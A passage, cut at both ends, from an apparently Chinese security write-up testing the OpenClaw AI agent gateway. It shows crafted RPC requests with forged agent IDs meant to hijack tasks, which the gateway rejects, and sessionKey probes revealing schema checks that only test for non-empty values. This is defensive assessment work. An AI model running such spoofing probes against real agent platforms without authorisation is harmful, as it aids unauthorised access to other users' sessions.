class="code-snippet__string">&#34;res&#34;</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;id&#34;</span>: <span class="code-snippet__string">&#34;...&#34;</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;ok&#34;</span>: <span class="code-snippet__literal">false</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;error&#34;</span>: {</span></code><br/><code><span leaf="">    <span class="code-snippet__string">&#34;code&#34;</span>: <span class="code-snippet__string">&#34;INVALID_REQUEST&#34;</span>,</span></code><br/><code><span leaf="">    <span class="code-snippet__string">&#34;message&#34;</span>: <span class="code-snippet__string">&#34;invalid agent params: unknown agent id </span><span class="code-snippet__string"><span class="code-snippet__subst">\&#34;</span></span><span class="code-snippet__string">fake-agent-9999</span><span class="code-snippet__string"><span class="code-snippet__subst">\&#34;</span></span><span class="code-snippet__string">&#34;</span></span></code><br/><code><span leaf="">  }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">分析结论：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">依据</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">存在 Agent 注册表</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">系统精确报告&#34;未知 Agent ID&#34;而非通用错误</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">路由层有存在性校验</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">未注册的 Agent ID 会被拒绝</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">请求处理链路</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">WebSocket 帧解析 → RPC 方法路由 → Agent 级参数校验</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验 2</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Agent 身份伪造防护验证</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验目的</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">验证是否可以通过伪造 Agent ID 劫持任务</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">前提条件</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已完成认证</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">假设：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">既然存在 Agent 路由表，那么是否可以通过伪造 Agent ID 来欺骗调度层，将任务劫持到恶意 Agent？</span></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证方法：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">构造包含自定义 agentId 的请求，尝试调用不属于自己的 Agent：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;type&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;req&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;id&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;...&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;method&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;agent&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;params&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;agentId&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;nonexistent-harness&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;hello&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;idempotencyKey&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;uuid-here&#34;</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应结果：</span></strong></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf="">{</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;type&#34;</span>: <span class="code-snippet__string">&#34;res&#34;</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;id&#34;</span>: <span class="code-snippet__string">&#34;...&#34;</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;ok&#34;</span>: <span class="code-snippet__literal">false</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;error&#34;</span>: {</span></code><br/><code><span leaf="">    <span class="code-snippet__string">&#34;code&#34;</span>: <span class="code-snippet__string">&#34;INVALID_REQUEST&#34;</span>,</span></code><br/><code><span leaf="">    <span class="code-snippet__string">&#34;message&#34;</span>: <span class="code-snippet__string">&#34;invalid agent params: unknown agent id </span><span class="code-snippet__string"><span class="code-snippet__subst">\&#34;</span></span><span class="code-snippet__string">nonexistent-harness</span><span class="code-snippet__string"><span class="code-snippet__subst">\&#34;</span></span><span class="code-snippet__string">&#34;</span></span></code><br/><code><span leaf="">  }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">分析结论：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">依据</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">采用白名单校验</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">只有已注册的 Agent 才能被调度</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">有效防止伪造攻击</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">未注册的 ID 会被直接拒绝</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">⚠️ 潜在信息泄露</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">错误响应返回完整 Agent ID，可能暴露内部命名规范</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验 3</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">会话持久化语义探测</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验目的</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">验证 sessionKey 格式和跨平台会话绑定能力</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">前提条件</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已完成认证</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">假设：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenClaw 原生支持跨平台会话绑定，sessionKey 中应包含通道类型和标识符。</span></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">验证方法：</span></strong></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">向 chat.history 发送包含不同平台特征 sessionKey 的请求：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="http"><code><span leaf=""><span class="code-snippet__attribute">sessionKey</span><span class="code-snippet__punctuation">: </span>agent:main:discord:channel:12345</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">sessionKey</span><span class="code-snippet__punctuation">: </span>agent:main:telegram:chat:67890</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">sessionKey</span><span class="code-snippet__punctuation">: </span>agent:main:feishu:chat:oc_xxx</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">sessionKey</span><span class="code-snippet__punctuation">: </span>agent:main:qqbot:direct:abc123</span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">响应结果：</span></strong></p></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网关对这些 sessionKey 的处理行为一致：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Schema 校验通过（仅检查非空）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">业务层根据实际是否存在对应会话返回结果或空结果</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">没有任何一个被拒绝为&#34;格式非法&#34;</span></strong></p></li></ul></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">分析结论：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">结论</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">依据</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">sessionKey 格式合法</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">agent:名称:平台:类型:ID 被 Schema 层静默接受</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持跨平台绑定</span></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">不同平台的 sessionKey 